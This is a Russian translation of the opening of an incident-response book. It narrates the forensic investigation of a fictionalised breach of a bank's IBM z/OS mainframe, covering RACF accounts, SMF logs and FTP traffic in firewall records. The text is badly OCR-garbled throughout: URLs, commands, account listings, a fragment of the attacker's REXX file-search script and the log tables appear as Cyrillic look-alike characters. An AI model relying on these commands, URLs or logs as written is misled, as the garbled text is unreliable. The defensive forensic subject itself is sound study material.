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Отказ от ответственности 


Примеры в этой книге полностью вымышлены. Описываемые 
инструменты и техники имеют открытый исходный код, а 
следовательно - доступны публично. Специалисты по безопасности 
и пентестеры регулярно используют их в своей работе, также как и 
атакующие. Если вы стали жертвой компьютерного преступления и 
обнаружили в этой книге демонстрацию техник или инструментов, 
то это никоим образом не означает, что автору этой книги можно 
инкриминировать любую связь с компьютерным преступлением, 
содержимое этой книги не дает никаких оснований полагать, что 
есть какая-либо связь между автором книги и преступниками. 

Любые действия и/или деятельность, связанные с 
материалом, содержащимся в этой книге, находятся целиком под 
вашей ответственностью. Неправильное использование 
информации из этой книги может стать результатом обвинений в 
совершении уголовного правонарушения в адрес соответствующих 
лиц. Автор не несет никакой ответственности за деяния лиц, 
использующих информацию из этой книги в преступных целях. 

Эта книга не призывает заниматься хакерством, взломом 
программного обеспечения и/или пиратством. Вся информация, 
представленная в книге, предназначена исключительно в 
образовательных целях. Она призвана помочь организациям 
защитить свои сети от атакующих, а следователям собрать 
цифровые улики во время расследования инцидентов. 

Совершение любых попыток по хакингу/взлому систем или 
тестирование систем на проникновение должно сопровождаться 
письменным разрешением от владельцев данных систем. 

Перевод выполнен в ознакомительных целях. Отблагодарить 
автора и приобрести данную книгу, а также другие оригинальные 
книги Спарка Флоу можно на его официальном сайте: 


ЬССр5://ѵѵщѵу.ЬаскМкеарогп5Саг.сот/Ье5С-Ьаскіпд-Ьоок5/ 



Предисловие 


Есть два вида компаний: те, что были взломаны, и те, что пока 
еще не знают, что были взломаны. А когда они по итогу узнают об 
этом - если им посчастливится - начинается отчаянная паника, 
которая быстро доходит до уровня руководства компании. 

В этой книге в подробностях описывается подобный инцидент, 
основанный на реальных событиях, начиная с первого 
сомнительного звонка, сделанного банком, до пика напряженности, 
вызванного предварительным криминалистическим анализом. 

Мы углубимся в такие темы, как анализ памяти, полное 
копирование диска, охота на угрозы и поиск однородных массивов 
данных, попутно обсудим идеи по управлению инцидентами из 
реальной жизни: как направлять людей в нужную сторону, каковы 
ключевые ответные действия при реагировании на инцидент, что 
говорить и делать в первые минуты после инцидента безопасности, 
а также как решить извечную проблему: безопасность против 
непрерывности бизнеса. 

Наконец, мы разберемся с самой важной проблемой: как 
восстановить доверие и безопасность информационной системы. 

Мы выясним, как нам вернуть доверие к машинам, которые 
были скомпрометированы, и как обеспечить, чтобы атакующие не 
вернулись для совершения ожесточенной мести. 

Примечание: кастомные скрипты и специальные команды, 
задокументированные в этой книге, публично доступны по адресу 
ѵѵѵѵѵѵ.ііаскіікеарогпзіаг.сот . 



Первый звонок 


" Соболезнуя страданиям, мы поступаем, как все люди; 
облегчая их, - как Бог" 

Хорас Манн 


Как и большинство основных инцидентов безопасности, наша 
история начинается с экстренного вызова в 6 утра: 

“Здравствуйте, это корпорация 1_ео5ігаі. Я пытаюсь 
дозвониться до Компьютерной группы реагирования на 
чрезвычайные ситуации (прим, переводчика: СЕНТ), чтобы 
доложить об аномальной активности в нашем мэйнфрейме. У 
нас есть основания полагать, что злоумышленники смогли 
получить доступ к критической банковской информации, и мы 
хотели бы попросить вас принять участие в проведении 
расследования”. 

“Хорошо. Пожалуйста, не выполняйте никаких действий на 
машине до тех пор, пока мы не прибудем на место”. 

Учитывая природу инцидента, мы быстро отправляем 
сотрудника службы реагирования, чтобы оценить уровень 
опасности и сложности атаки. С чем мы имеем дело: с классической 
малварью, руткитом или таргетированной атакой? Какими уликами 
мы обладаем? Какие еще машины заражены? 

Хотя нас смущает небольшая деталь: особенность машины, 
которая, согласно докладу, была затронута. Как вообще возможно 
наличие малвари в мэйнфрейме? Для подобных систем даже нет 
публично известных уязвимостей, которые могли бы быть 
перечислены на популярных веб-сайтах. 1 

На самом деле, мы удивлены тому, что атакующий вообще 
решил заморочиться с выбором в качестве цели подобной 
устаревшей машины. 

В любом случае, для подготовки выезда на место инцидента, 
мы собираем наш стандартный набор инструментов: 


1 ѵѵѵѵѵѵ.сѵе-сіеіаііз.сот 




• Ноутбук с Каіі Ыпих и ѴѴіпсІоѵѵз для проведения анализа. 
Некоторые люди предпочитают использовать виртуальную 
машину 5ІРТ 2 , которая поставляется с предустановленными 
инструментами для компьютерных расследований. 

• Несколько пустых внешних жестких дисков. Они всегда 
пригодятся, так что берем как можно больше. 

• Загрузочную ІІЗВ-флешку с дистрибутивом ЭеЬіап. 

• ІІЗВ-флешку с классическими криминалистическими 
инструментами, а также “чистые” версии бинарников Ыпих и 
ѴѴіпсІоѵѵз (стб.ехе, Ьазіі и так далее). 

• Набор отверток на случай, если нам придется иметь дело с 
физическими машинами. 

• Физический блокировщик записи для работы с копиями 

• Вспомогательное оборудование: КМ5-ІІ5В адаптер, ІІЗВ-хаб, 
ІІЗВ-С-ІІЗВ адаптер, папа-мама ІІЗВ-кабель, 8АТА-ІІ5В 
адаптер... 

План действий 

Мы приезжаем в офис 1_ео31гаі к семи утра и запрашиваем три 
стандартные вещи, как и обычно при проведении расследований: 

• Свежие данные по обстановке. 

• Все документы, описывающие архитектуру сети и систем. 

• Контактную информацию всех ключевых ІТ-сотрудников в 
компании (сетевых админов, админов мэйнфрейма, админов 
Ыпих, админов ѴѴіпсІоѵѵз, сотрудников службы безопасности, 
главного инженера и проч.) 

Некоторые считают, что следователь-криминалист по 
компьютерным преступлениям - это какой-то волшебник, который 
может мгновенно изгнать зло при помощи своей волшебной 
палочки. Это не имеет ничего общего с реальностью. 


2 ИНр5://сІіаИаІ-Тогеп5ІС5.5ап5.ога/соттипі{ѵ/сІоѵѵпІоасІ5 




Занырнуть в незнакомую экосистему и разобраться с 
хитросплетением ее сложностей - это та еще задача. Именно 
поэтому критически важно заполучить как можно больше 
документов, а также быстро идентифицировать ключевых 
сотрудников, которые могут помочь нам в расследовании: выдать 
карту критичных машин, извлечь логи, создать учетные записи, 
общаться с персоналом и так далее. 

Пока І_ео51гаі составляет свою группу кризисного управления 
и подготавливает изменения, мы получаем описание инцидента от 
админа мэйнфрейма (системный администратор/системный 
программист): 

“Мы заметили аномальный пик в нагрузке СРІІ примерно в 4 
утра. Наш системный программист проверил ЗЕ5 5Р00І. и 
обнаружил задание (ЛЭВ), использующее практически все І/О. 
ЮВ был запущен неизвестной учетной записью под именем 
С09861”. 3 

Перед тем, как спросить, что это за хрень такая - ЗЕ5 5Р00І_, 
мы начинаем с немного наивного вопроса: 

“Итак, насколько нам известно, утекли какие-то банковские 
данные?” 

“Мля, на 2-машине у нас учетные записи клиентов, данные по 
пенсионному страхованию, бухгалтерские файлы, 
персональные данные, налоговая отчетность... и все такое.” 

И вот тогда к нам приходит озарение! Мэйнфрейм в их 
компании - это не старая добрая тачка, которой уже никто не 
пользуется; в нем обрабатываются все их ключевые 
бизнес-процессы! Это вселяет надежду </сарказм>. 


3 Похожий инцидент, начавшийся с подобного же звонка, описан в этом видео от Наскііѵііу: 
Иир5://\л/\л/\л/.ѵои{иЬе.сот/ѵѵа{сІ~і?ѵ=5ИѵіТ/ѴТатс 




Теперь, когда мы заинтригованы, давайте разберемся, что 
произошло в этом мэйнфрейме... 

Давайте начнем с самой машины. Мэйнфрейм - это большая 
железная машина, которая совершенно не напрягаясь 
поддерживает работу до 20 миллиардов транзакций в сутки 4 : 
безналичный перевод денежных средств, снятие денег со счетов, 
бронирование авиабилетов и т.п. 75% компаний из списка Роііипе 
500 используют 2-серию от ІВМ, которая вне всяких сомнений 
является основой современной бизнес-экономики. 

Подумайте об этом следующим образом: когда вы, например, 
бронируете машину в ІІЬег, вы приводите в действие транзакцию в 
мэйнфрейме. 

На этих машинах могут работать несколько операционных 
систем. Основная их них - это 2/05, продукт, разработанный ІВМ. И 
программное, и аппаратное обеспечение активно поддерживаются 
обновлениями безопасности, новыми релизами и т.д. - практически 
никаких старых версий. 

Лицензионная модель мэйнфреймов немного отличается от 
других машин. Компании платят ІВМ миллионы долларов ежегодно 
исходя из потребления ресурсов центрального процессора (СРІІ). 
Чем выше нагрузка, тем больше они платят; по этой причине группа 
поддержки оборудования в І_ео31гаі так пристально отслеживает 
производительность мэйнфрейма. 

В г/08 используется аналог задания или программы - ^В. 
Все, что работает в мэйнфрейме, это либо задание ЮВ, либо это 
было запущено при помощи ѵЮВ. Как и во всех современных 
операционных системах, все программы фОВ) управляются 

4 214 был выпущен в июле 2017 года; технические характеристики просто запредельные: 

ИНр://\л/\л/\л/.гесіЬоок5.ІЬт.сот/гесіЬоок5/рсІГ8/5а248450.рсИ : 




внутренним планировщиком (в данном случае, ^5), который 
принимает решение, какой программе разрешается использовать 
ЦП, как долго и так далее. 

В ночь на 14 марта, примерно в 4 утра, подозрительной 
учетной записью был запущен ѵЮВ. Он вызвал достаточное 
количество операций ввода/вывода за короткий промежуток 
времени, что привело к возникновению предупреждения о 
достижении пороговых значений, которое было замечено командой 
по обслуживанию оборудования. Операции ввода/вывода означают 
только одно: этот ЛЭВ читал/записывал файлы на диске. 

Учитывая характер данных, хранимых на этом конкретном 
диске, это стало поводом для поднятия тревоги. 

Предварительная диагностика 

Теперь, когда у нас появилось базовое представление о 
ситуации, мы собираем оперативное совещание с кризисной 
командой для обсуждения безотлагательных мер: 

• Выполнить форензик-анализ мэйнфрейма. 

• Запросить в отделе кадров список администраторов 
мэйнфрейма. 

• Извлечь логи трафика, предназначенного для мэйнфрейма, за 
последние 72 часа до инцидента. Команда, отвечающая за 
корпоративный файрвол, хранит логи в течение трех месяцев, 
так что с этим не должно возникнуть проблем. 

• Повторно запросить полную схему корпоративной сети. 

• Попросить всех администраторов увеличить детализацию 
логов тех компонентов, за которые они несут ответственность. 
Закупить дополнительные жесткие диски, если их не хватает, 
но необходимо включить абсолютно все события: ѴѴіпбоѵѵз, 
Ыпих, файрволы, мэйнфрейм и так далее. 


При проведении расследований на машинах необходимо 
соблюдать ряд правил. 

Во-первых, не ковыряться в машине до выполнения полного 
копирования памяти и диска, следуя отраслевым стандартам 
(более подробно об этом позже). 

Во-вторых, вообще никогда не собирайте данные, используя 
инструменты, установленные на зараженном хосте. Хотя эти 
правила звучат разумно, мы собираемся забить на них прямо 
сейчас. 

Мы имеем дело с мэйнфреймом. 

Нет набора правил, и тем более, инструментов для снятия 
дампа сырой памяти. Мы можем извлечь отдельные программы из 
памяти при помощи некоторых продвинутых и дорогостоящих 
инструментов или малопонятных макросов на ассемблере, но не 
полное пространство памяти (на последней версии 214 объем 
может достигать до 32 ТБ 5 ). 

Давайте даже не будем поднимать тему со сбором петабайтов 
данных с дисков и магнитных лент. Мы в неизведанных водах 
сейчас. Время действовать в духе коммандос. 

Мы одалживаем учетную запись администратора и 
подключаемся к машине, используя эмулятор ТЫ3270, это 
іеіпеі-подобный клиент для коммуникации с мэйнфреймом, который 
можно свободно скачать. 6 

Учетная запись пользователя, ответственная за 
подозрительную программу, это стандартная техническая учетная 
запись под именем С19861, вероятно использованная для “полета 


5 Техническое руководство по 2І4: Нйр:/Алллл/ѵ.гесі Ьоокз. і Ьт. сот/гесіЬоок5/рсІГз/зд248450 . осІГ 

6 Н«р://х3270.Ьдр.пи/ 





над радарами”. Мы выполняем команду ИБТЫЗЕК для получения 
большей информации: 


І.І5Ти5ЕК 

ІІ5ЕК=С19861 МАМЕ=С19861 ОШЕК=ІВМи$ЕК СРЕАТЕО=17.074 

0ЕЕАІЛ_Т-еК0иР=5Ѵ51 РА550АТЕ=17.074 РА$5-ІМТЕКѴАІ_=180 

АТТРІВІІТЕ5=5РЕСІАІ. РЕѴОКЕР 

КЕѴОКЕ 0АТЕ=17.074/05:54:35 КЕ51ІМЕ РАТЕ=^Е 
І.А5Т-АССЕ55=17.074/03:50:39 

СІ.А55 АІІТНОКІ2АТІОМ5=М(МЕ 


С19861 была создана 14 марта (74-й день 2017 года) и в 
последний раз использовалась в 03:50 по ІІТС того же дня, это 
означает, что атакующий преднамеренно создал эту учетную запись 
для запуска своей программы по поиску файлов, которую он 
запустил уже через 10 минут. 7 У этой учетной записи атрибуты 
5РЕСІАІ. и ОРЕКАТПШ5, что дает ей доступ к любому файлу на 
диске. 

Но есть одна странность. Эта учетная запись была 
аннулирована/отозвана (КЕѴОКЕО). В этом нет смысла. Сисадмин 
объясняет нам, что они приняли решение заблокировать учетную 
запись на случай, если атакующий решит перезапустить свою 
программу... в ответ на нашу просьбу ничего не трогать получаем 
вот такой вот номер! 

Ко всеобщему удивлению, мы активируем учетную запись 
командой “АІ_ТЕРШ5ЕК С19861 КЕ5ЦМЕ”. Через пять секунд 
вмешивается начальник службы безопасности и вырывает 
клавиатуру, требуя немедленного объяснения. 

“Сэр, можно восстановить учетную запись, либо попросту 

написать хакеру приветственное сообщение...” 


7 Всегда учитывайте временную зону, настроенную на машине, и выполняйте правильную 
конвертацию перед сравнением полученных данных с событиями, извлеченными с других 
машин. Мы будем использовать хронологию, используя временную зону ІІТС. 





Несанкционированный доступ - это всегда продолжительная 
активность. Жертвам кажется, что он длится короткое время, 
потому что они замечают его совершенно неожиданно. Это мощный 
удар по эго, который заставляет мозг работать необдуманно, 
вопреки здравому смыслу. 

Правда в том, что к тому времени, как обнаруживается 
присутствие атакующего, он может находиться в сети уже несколько 
месяцев. 8 

Он проверил совершенно все в поисках ценных данных. Он 
шпионил за пользователями, чтобы узнать, как, где и когда они 
работают. В большинстве случаев он знает системы лучше, чем их 
владельцы. 

Совершая такой опрометчивый поступок, как отключение 
учетной записи атакующего, мы даем ему знать, что его празднику 
приходит конец. С этого момента у него как правило есть два 
варианта: 

• Залечь на дно на несколько недель, затем вернуться, 
используя другую точку для входа. 

• Незамедлительно воспользоваться альтернативными точками 
входа для заражения большего количества машин на тот 
случай, если другие учетные записи будут отловлены, либо, 
если он реально расстроится, то он может уничтожить данные 
на всех машинах. 

Кто хочет поиграться с психологическим профилем 
атакующего? Совершенно точно, не начальник службы 
безопасности. Поэтому, мы получаем обратно в свои руки 
клавиатуру и возвращаемся к делу. 


8 
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Владельцем учетной записи С19861 является ІВМЦ5ЕК (см. 
предыдущий скриншот). Можно предположить, что атакующий также 
скомпрометировал и эту учетную запись, которая представлена по 
умолчанию на всех мэйнфреймах, но мы быстро осознаем, что 
ІВМІІ5ЕГС по факту отключен: 


І.І5Ти5ЕК ІВМІІ5ЕР 

и5ЕК=ІВМи5ЕК МАМЕ=ІВМІІ5ЕК ОМІЕК=ІВМи5ЕК СКЕАТЕ0=99.197 
ОЕЕАІЛ_Т-6КОиР=5Ѵ51 РА550АТЕ=12.213 РА55-ІМТЕКѴАІ_=М/А 

АТТКІВІІТЕ5=5РЕСІАІ. ОРЕКАТІОМ5 РЕѴОКЕй 
РЕѴОКЕ ОАТЕ=М(ЖЕ КЕ51ІМЕ ОАТЕ=МОМЕ 
І.А5Т-АССЕ55=12.213/15:39:05 


Может быть, атакующий отключил учетную запись позже, но 
это было бы рискованным действием, поскольку это могло бы 
остановить работу приложений, работающих с этой учетной 
записью, что наверняка встревожило бы службу безопасности 
І_ео5ігаі. Вдобавок, и это подтверждает сисадмин, на атрибут 
владельца (СММЕК) не стоит особо полагаться, поскольку он может 
быть изменен произвольно в меню создания учетных записей. 

До настоящего времени мы использовали командную строку в 
мэйнфрейме, известную как ТЗО (Тіте ЗИагіпд Орііоп, 
интерактивное окружение разделения времени). Тем не менее, в 
2/03 также имеется 0111-подобная программа под названием ІЗРР, 
которую можно использовать для просмотра/редактирования 
файлов, настроек и, что наиболее важно, для просмотра программ, 
которые работали в мэйнфрейме. 

Есть вероятность, что это поможет нам собрать улики из 
подозрительной программы, которая изначально подняла тревогу. 
Набираем команду “ізр-Г в командной строке, получаем вот такой 
вот “симпатичный” (3111-интерфейс: 




Идем в панель ЗЭЗР в г/05 (опция 5 в ІЗРР). Здесь хранится 
история заданий ЛЭВ, работающих в мэйнфрейме. Мы надеялись 
найти другие программы, запущенные пользователем С19861, но 
есть только одна запись: первоначальный ЛЭВ, вызвавший 
перегрузку СРІІ. 


5Р5Р 5ТАТЦ5 РІ5РІ.АѴ АН СІ.А55Е5 НМЕ 1-1 (1) 

РРЕРІХ=* 0Е5Т=(АІ-І.) ОІлІМЕР=619861 5Ѵ5МАМЕ= 

МР ЗОВМАМЕ ЗоЬЮ Омпег РгТу (Эиеие С Ро5 БАТТ 

5 (519861 30ВѲ273Ѳ 619861 1 РКІІЧТ А 809 


Мы открываем отчет по данным, сгенерированным 
программой (на жаргоне мэйнфреймов он называется ЗРООІ_), 
набрав 5 слева от имени программы. Отчет содержит поток 
выполнения, ошибки и даже фрагменты исходного кода. 


В нашем случае, погребенные под сотнями строк отладочных 
данных, мы замечаем команду “ЕХ” (сокращение от “ехесиіе”, 
“выполнить”) 9 : 


ІЕР373І 

5ТЕР/5ТЕР01 

/5ТАКТ 

2017074.0400 



ІЕЕ374І 

5ТЕР/5ТЕР01 

/5Т0Р 

2017074.0404 

СРЫ 

4М^ 

ІЕР375І 

ЗОВ/6198611 

/5ТАКТ 

2017074.0400 



ІЕР376І 

КЕАОѴ 

ЗОВ/6198611 

/5Т0Р 

2017074.0400 

СРУ 

4МIN 

Ех 1 619861.5ЕАКСН’ ' 

РА55МОРО ВАІ.АМСЕ АССООМТ 

гп 

с 

т> 

о 


9 Как и в любом стандартном текстовом браузере в мэйнфрейме, мы можем искать данные, 
набрав “РІЫО <Текст>” в командной строке. 
















“С19861.5ЕАКСН” - это пример того, какими могут быть имена 
файлов в мэйнфрейме. Эта команда запускает скрипт и передает 
ему список банковских ключевых слов для поиска. 

**Примечание по наборам данных** 

Файлы в мэйнфрейме называются наборами данных. Каждое 
имя файла состоит из нескольких квалификаторов, разделенных 
точкой, также как в ЭЫЗ-именах: 5РАКС.РИЕ 

Первый квалификатор называется высокоуровневым 
квалификатором (Нідіі І_еѵеІ ОиаМЛег, НЮ). У каждого пользователя 
есть свой собственный НЮ для хранения его персональных 
файлов. 


**** 


Мы можем выбрать файл “еі9861.5ЕАКСН” для изучения его 
содержимого при помощи панели ІЗРР (опция 3, затем меню 4): 


асИге55 Тбо "ехесіо * сіізкг II (вТегп II. Тіпіб)" 
асІсІгеББ Тбо "Тгее ТіІе(ІІ)" 

(іо з=1 Іо II.0 

II. з = Тгап5Іа1:е(ІІ.з) 

ІТ (іпсІех(ІІ.з,5ТК) > 0) *Неп, 

СІО 

О = ОТ з іі-з 

5ЭѴ О 

саіі мгіѣеРО 0,ТТ,КК 

епсі 


Как можно заметить, мы имеем дело с РуіИоп-подобным 
скриптом 10 , который проходит циклом по главному каталогу (Мазіег 
саіаіод), обращаясь ко всем файлам в мэйнфрейме в поисках ранее 
упомянутых ключевых слов при помощи функции іпсІех(). 


10 НЕХХ-скрипт, если быть точным. 





Он не передает информацию на удаленный хост, а скорее, 
сохраняет местоположение интересных файлов в домашнюю папку 
пользователя (в скрипте также определена функция мгі1:еР0). 

Это интересная информация, однако она не проливает свет на 
истинную причину атаки и не дает нам дальнейших зацепок. 
Учетная запись С19861 не имеет примечательной активности в 
системе, а скрипт всего лишь несколько строчек длиной... Похоже, 
мы зашли в тупик в нашем расследовании. 

В подобные нередкие моменты сомнений будет всегда 
хорошей идеей перестать глазеть на известные артефакты и начать 
искать новые улики. Нам нужно вернуться в прошлое и поискать 
любое странное поведение на машине. 

Учетная запись С19861 не создала саму себя магическим 
образом. Атакующий должен был сначала “поколдовать” с 
системой, прежде чем добиться достаточных привилегий для 
создания учетной записи. Определенно, где-то должны быть 
какие-либо теплые следы. Мы просим админа сделать экспорт 
зузіод для изучения активности системы. 

“В мэйнфрейме нет такой штуки, как зузіод. Здесь все 

отличается от “открытого” мира”. 

Как насчет любой другой логирующей утилиты? Должен быть 
какой-то журнал, описывающий происходящее в мэйнфрейме. 

“У нас есть ЗМР-записи”. 

Я стараюсь передавать реплики диалогов, какими они были в 
реальной жизни, чтобы вы смогли понять о проблемах, с которыми 
мы сталкиваемся, будучи экспертами-криминалистами. Нелегко 
получить полное взаимодействие от 30-летнего профессионала, 


который слепо доверяет своей машине, не говоря уже о получении 
релевантных данных в готовом для использования формате. 

Более того, в начале кризисной ситуации присутствует дикая 
атмосфера. Каждый сотрудник опасается, что атака могла на деле 
произойти по его вине. В других ситуациях люди подозревают друг 
друга, что еще более усложняет работу в команде. В разгаре 
кризиса вам следует учитывать все эти моменты и стараться 
максимально успокоить и подбодрить окружающих касаемо хода и 
результатов расследования. 11 

Для непосвященных, 5МР-записи - это в буквальном смысле 
файлы с логами в г/ОЗ. В них хранятся события, запущенные 
системой (нарушения доступа, неудачные попытки авторизации, 
использование СРІІ и так далее). 

Вместо того, чтобы потратить часы на выяснение, как 
написать скрипт для извлечения данных в осмысленном формате, 
мы попросту просим сисадмина экспортировать ЗМР-записи в 
обычный текстовый файл, задействуя их коммерческий софт для 
аудита. 

**Примечание по логированию и 5ІЕМ** 

Те из вас, кто работает в области сыска, возможно, задаются 
вопросом о корреляции логов в мэйнфрейме. Смею вас заверить, 
это не только осуществимо, но и рекомендуется ІВМ. 12 

ЗМР могут быть настроены на мониторинг практически всего в 
2, начиная от нагрузки СРІІ и до специфических нарушений правил 


11 Звучать обнадеживающе не значит слепо доверять людям или отложить логику в сторону. 
Нужно держать в уме вероятный сценарий с диверсией со стороны инсайдера, если 
имеющиеся данные указывают на подобный вариант событий. Запомните, больше половины 
атак выполняются инсайдерами. 


12 ИНр5://ѵѵ\л/ѵѵ.іЬт.сот/Ь5-еп/тагке1рІасе/5есигИѵ-25есиге-асіар{ег5-1 : ог-5Іет 




доступа. Данные из логов могут стримиться в ЗІЕМ, как и в случае с 
любой другой технологией. 

И все же компании значительно отстают по части 
отслеживания активности в мэйнфреймах. Достаточно трудно найти 
компании, которые логируют ЗМР-записи, связанные с 
безопасностью, не говоря уже про те из них, что направляют логи в 
централизованную ЗІЕМ, в которой реализованы базовые правила 
корреляции... 


**** 


Нас больше всего интересуют события, произошедшие до 14 
марта, 03:50 ІІТС. Более того, поскольку атакующий ведет поиск 
файлов, мы извлекаем только события с запросами доступа, чтобы 
не потонуть в обилии информации. Как и в ѴѴіпсІоѵѵз, у каждого 
события ЗМР есть идентификатор, выбираемый исходя из 
приложения, которое его породило. В запросах на получение 
доступа имеется Ю 80: 


гоо1(аі_аЬ 

:~# саі : 

2МР.РАТА 








;ісшаме 

5МР8ѲТМЕ 

ЕѴЕІМТ 01ІАІЛРІЕВ 

УЗЕВ 

своур 

NАМЕ 

ВЕ0УЕ2Т 

АЕЬ0\я/Е0 


ІВАРМЕѴ 

2017.73 

05:30:10 

N01: 

аиіііогігесі 

ВАИМЕѴ 

2У30ЕѴ 

ВАСКІІР. АСС0^NТ 

ВЕАО 

N0NЕ | 1 

ВАРМЕѴ 

2017.73 

05:30:15 

N01 

аиіЬогігесІ 

ВАИСУ 

ЗУЗРЕѴ 

ВАСКУР.САТАЮО 

ВЕАО 

■ШЭН! 

ВАРМЕѴ 

2017.73 

05:30:19 

N01 

аиІЬогігѳсІ 

ВАРШЕѴ 

5У2РЕѴ 

ВАСК11Р.РАЗЗ 

ВЕАО 

N0NЕ 

ВАРѴіІЕѴ 

2017.73 

05:35:45 

N01 

аиІЬогігесІ 

ВАНСУ 

2У2РЕѴ 

васкур.рвор 

С0NТВ0^ 

N0NЕ 

ВАИМЕѴ 

2017.73 

05:55:21 

N01 

аиІЬогігесІ 

ВАИІЕУ 

ЗУЗРЕѴ 

2У31.ВАСР03 

ВЕАО 

N0NЕ 

ВАИМЕѴ 

2017.73 

06:05:21 

N01 

аиіЬогігесІ 

ВАВNЕУ 

2У5РЕѴ 

ЗУЗІ.І-^КІЛВ 

УРРАТЕ 

N0NЕ 


Мы замечаем нечто странное. 13 марта в 05:30 утра по ІІТС 
(ночь накануне атаки) пользователь ВАКІМЕѴ вызвал множество 
ошибок нарушения доступа при чтении файлов. 

Это ненормально, в частности потому, что пользователь 
ВАКІУІЕѴ имеет атрибут 5РЕСІАІ., это можно проверить в 
Ііѵе-системе. Теоретически, у него должна быть возможность 
получения доступа ко всем файлам без каких-либо вопросов. 







І.І5Ти5ЕК ВАІМЕѴ 

1)5ЕК=ВАКМЕѴ МАМЕ=ВАКМЕѴ 0ШЕК=ІВМи5ЕК СКЕАТЕО=11.002 
0ЕРАІЛ_Т-СК0иР=5Ѵ51 РА550АТЕ=17.010 РА55-ІЫТЕКѴАІ_=180 

АТТКІВІЛЕ5=5РЕСІАІ 

КЕѴОКЕ ОАТЕ=ГЮМЕ КЕ511МЕ ОАТЕ=№ЖЕ 
І.А5Т-АССЕ55=17.074/03:53:33 

СІ.А55 АІ)ТНОКІ7АТІОМ5=МОМЕ 


Мы смотрим на официальный список администраторов, 
который предоставил нам начальник службы безопасности, но не 
можем найти там нашего уважаемого Барни. В списке указано, что 
он разработчик в НК. Мы спрашиваем у системного программиста, 
все ли разработчики являются администраторами в 2, но он не 
уверен, что это так. Хотя вот в чем он точно уверен - Барни 
находится в отпуске уже несколько дней к настоящему моменту. 


Любопытно! Мы возвращаемся к списку файлов, породивших 
нарушения доступа, и обращаем внимание на один 
примечательный файл: 5Ѵ51. КАСРР5 


гооЦСаЬ 

:~# саг : 

ЗМР.ОАТА 








.ЗСШАМЕ 

ЗМР8ѲТМЕ 

ЕѴЕІМТ ОІІАІЛРІЕВ 

113ЕВ 

0ВОІІР 

NАМЕ 

ВЕдіІЕЗТ 

АІСОѴСО 

ВАИСУ 

2017.73 

05:30:10 

N01: 

аиІЬогігѳсІ 

ВАІИСУ 

5У50ЕѴ 

ВАСК1ІР. АССОШТ 

ВЕАО 

NОNЕ 

ВАИСУ 

2017.73 

05:30:15 

N01 

аиІЬогігесІ 

ВАИСУ 

5У50ЕѴ 

ВАСК1ІР.САТАІ-0С 

ВЕАО 

NОNЕ 

ВА(ЭДЕУ 

2017.73 

05:30:19 

N01 

аиііюгігесі 

ВАИСУ 

ЗУЗйЕѴ 

ВАСК1ІР .РА55 

Р.ЕАІ) 

NОNЕ 

ВАИСУ 

2017.73 

05:35:45 

N01 

аиііюгігесі 

ВАИСУ 

5У50ЕѴ 

ВАСК1ІР.РВ00 

СОNТВО^ 

NОNЕ 

ВАИСУ 

2017.73 

05:55:21 

N01 

аиІЬогігесІ 

ВАРШЕУ 

5У50ЕѴ 

5У51.ЯАСРйЗ 

ВЕАО 

NОNЕ 







ВАНСУ 

ттаг 


ІІРІ1А 1Ь 



КАСР - это приложение, обрабатывающее все авторизации и 
контроль доступа в 2/08. Это не просто приложение безопасности; 
это единственное приложение безопасности. В файле 5Ѵ51.КАСР05 
КАСР хранит все пароли учетных записей, правила доступа, 
закрытые ключи и так далее. 

Похоже, что на определенном этапе времени у Барни не стоял 
атрибут 5РЕСІАІ., с его учетной записью пытались откровенно 
скачать базу данных с паролями (и прочие файлы), что 
сгенерировало события нарушения доступа. 









Однако позже для его учетной записи удалось проставить 
атрибут БРЕСІАЬ. Возможно, даже удалось скачать базу данных с 
паролями. Мы не можем знать этого наверняка, потому что эта 
установка НАСР не была настроена на логирование успешных 
попыток доступа к файлам. 

Этот вывод основан на одном простом факте: обойти НАСР и 
повысить привилегии в 2/03 возможно. Системный программист и 
его команда решительно оспаривают этот факт, и этому есть 
очевидные причины: ІВМ громогласно заявляют при каждом 
удобном случае, что мэйнфрейм - это самая защищенная 
вычислительная платформа в мире. 13 

Тем временем, мы наконец получаем логи файрвола 14 с 
практически всеми соединениями с мэйнфреймом за последние 72 
часа. Мы хотим подтвердить нашу теорию, поэтому начинаем с 
поиска наличия типовых протоколов передачи файлов. 

Их не так много, как вы могли бы подумать: ТЫ3270 
(іеІпеРподобный протокол) ненадежен, поскольку он медленный и 
иногда лажает при передаче крупных файлов. ЗЗН не включен в 
этом мэйнфрейме, что исключает ЗСР. Поэтому остается основной 
и очевидный кандидат - РТР. 

Мы ищем доступ по РТР (ТСР порты 20 и 21) примерно в то 
время, когда, как мы подозреваем, Барни скачал базу данных, то 
есть между 13 марта в 05:30 ІІТС (нарушения доступа в НАСР) и 14 
марта в 03:50 ІІТС (создание учетной записи С19861): 


13 ННрзі/Алл/ѵѵѵ-ОІ .ІЬт.сот/соттоп/55І/сді-Ып/55ІаІіа5?НітІТІгі=ОВЕ038521)5ЕМ 

14 Примеры команд для осуществления этого в Эипірег РігеѵѵаІІ: 


И№5://\л/ѵѵ\л/.іипірег.пе<УсІоситеп<:а1:іоп/еп ІІЗ/іиповДоріса/геГегепсе/соттапсі-виттагѵ/вІіоѵѵ-'Гігеѵѵа 

ІІ-Іод.ИітІ 






аЬ:~/НІК# дгер -ЕКі " 

:2Ѳ |:21 " 

* .ТхТ 



#Тітѳ 


ІпТѳгТасе РгоТ. 

5 гс Асісіг 

ОезТ Асісіг 

РаскѳТ ІепдТИ 

2017-03-13 

06:50:17 

ТхрѲ.0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

76 

2017-03-13 

06:50:17 

ТхрѲ.0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

76 

2017-03-13 

06:55:18 

ТхрѲ .0 

ТСР 

10.40.40.44:40213 

192.168.1.25:20 

926 

2017-03-13 

07:00:22 

■ТхрѲ .0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

76 

2017-03-13 

07:00:23 

■ТхрѲ .0 

ТСР 

10.40.40.44:40213 

192.168.1.25:20 

40090241 

2017-03-13 

07:37:17 

ТхрѲ .0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

90 

2017-03-13 

07:37:19 

ТхрѲ .0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

19 

2017-03-13 

07:37:20 

ТхрѲ.0 

ТСР 

10.40.40.44:40213 

192.168.1.25:20 

9710 

2017-03-13 

07:44:17 

ТхрѲ.0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

19 

2017-03-13 

07:44:18 

ТхрѲ.0 

ТСР 

10.40.40.44:40213 

192.168.1.25:20 

7541 


